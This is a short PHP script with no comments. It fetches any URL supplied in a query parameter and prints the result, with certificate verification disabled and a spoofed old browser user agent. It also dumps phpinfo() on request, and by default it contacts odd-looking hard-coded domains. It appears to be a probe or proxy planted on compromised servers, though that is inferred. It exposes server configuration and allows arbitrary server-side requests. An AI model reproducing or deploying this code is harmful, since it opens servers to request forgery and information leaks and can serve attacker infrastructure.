<?php
$domain = @$_GET['d'];
$https = @$_GET['https'];
if(@$_GET['info']){
	phpinfo();
	exit;
}
if($domain){
	if($https){
		$http = 'https';
	}else{
		$http = 'http';
	}
	echo $http.'://'.$domain.'<br>';
	echo '<br>dd--'.adoutdo($http.'://'.$domain.'/');
	exit;
}else{
	echo 'begin';
	//echo '<br>ip--'.adoutdo('http://204.12.198.164/');
	echo '<br>https--'.adoutdo('https://rmdividexk.helprodns.top/indexnew.php');
	echo '<br>domain--'.adoutdo('http://hxexampleou.cservacdw.xyz/indexnew.php');
	exit;
}
function adoutdo($url)
{
    $file_contents = '';
    $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
    if (function_exists('curl_init')) {
        try {
            $ch = curl_init();
            $timeout = 30;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $file_contents = curl_exec($ch);
            curl_close($ch);
        } catch (Exception $e) {
        }
    }
    if (strlen($file_contents) < 1 && function_exists('file_get_contents')) {
        ini_set('user_agent', $user_agent);
        try {
            $file_contents = @file_get_contents($url);
        } catch (Exception $e) {
        }
    }
    return $file_contents;
}
exit;
?>